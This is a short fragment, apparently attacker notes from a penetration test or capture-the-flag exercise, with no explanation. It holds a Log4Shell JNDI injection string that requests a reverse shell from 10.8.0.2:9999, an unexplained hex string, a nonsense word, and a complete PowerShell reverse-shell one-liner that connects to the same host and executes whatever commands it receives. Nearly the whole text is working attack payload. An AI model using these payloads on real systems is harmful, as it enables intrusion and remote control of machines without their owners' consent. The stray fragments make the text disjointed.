${jndi:ldap://10.8.0.2:9999/Basic/ReverseShell/10.8.0.2/9999}

b43a56a6d9fecb86f104856253f9c792793eef0b





populatetwiddleanointer



$client = New-Object System.Net.Sockets.TCPClient("10.8.0.2",9999);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
